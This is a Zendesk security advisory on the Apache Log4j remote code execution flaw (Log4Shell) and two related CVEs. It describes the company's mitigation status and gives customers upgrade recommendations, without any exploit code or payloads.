2021-12-13 Security Advisory - Apache Log4j (CVE-2021-44228)

This security advisory provides customers with an update on how Zendesk services are affected by the Apache Log4j vulnerability (CVE-2021-44228). This vulnerability has been referred to as Log4Shell by some outlets.

Status update on December 23, 2021: Zendesk has mitigated known instances of this vulnerability in our product environment.

What is this vulnerability?

A Remote Code Execution (RCE) vulnerability was discovered in the popular Java logging library, Log4j. This industry-wide security vulnerability allows for an unauthenticated adversary to execute code on systems that have this library deployed, by providing specific crafted content. This is a serious vulnerability that affects many software products and online services.

How does this vulnerability affect Zendesk?

Zendesk utilizes Apache Log4j in its products. This vulnerability was revealed on Thursday, December 9, 2021. We have mitigated known instances of this vulnerability and continue to actively monitor this issue.

In response, we activated our incident response process and immediately investigated the use of Log4j across Zendesk products. As a result:

We identified and triaged all Log4j deployments in all our products, and implemented the vendor-provided update or recommended mitigations to our systems.
We have worked and as new information arises, will continue to work with our sub-processors and critical vendors to ensure they remediate any vulnerabilities in their environments that we may rely on.

We have also mitigated this vulnerability by deploying rules to block malicious exploitation. However, we recognize these rules are not 100% effective and they are only a secondary level of mitigation.

At this point, our investigation of use of Log4j in our product is complete, and our security teams are continuing to track security issues involving Log4j as part of our regular security monitoring and patch management implementation.

Did Zendesk investigate CVE-2021-45046 and CVE-2021-45105?

As part of our response to this vulnerability, we also investigated CVE-2021-45046 and CVE-2021-45105 in Log4j. We performed a risk assessment and took action where they exposed significant risk. Of note, CVE-2021-45105 is a Denial of Service vulnerability only which does not affect most configurations.

What actions should I take?

Users of Zendesk services do not need to take any action at this time.
Users of custom products developed under Professional Services agreements are typically responsible for their own security updates, but should review their agreement as appropriate, and validate use of the Log4j component.

We also strongly recommend customers evaluate their own use of the Apache log4j logging library in conjunction with our products in any custom apps or integrations you may have developed or deployed.

If use of a vulnerable version is identified, we strongly recommend upgrading to the fixed version provided by the Apache Software Foundation, or implementing a vendor-recommended mitigation.

Where can I find more information?

Additional information on this vulnerability can be found here:

Apache Software Foundation: Apache Log4j Security Vulnerabilities
National Vulnerability Database: CVE-2021-44228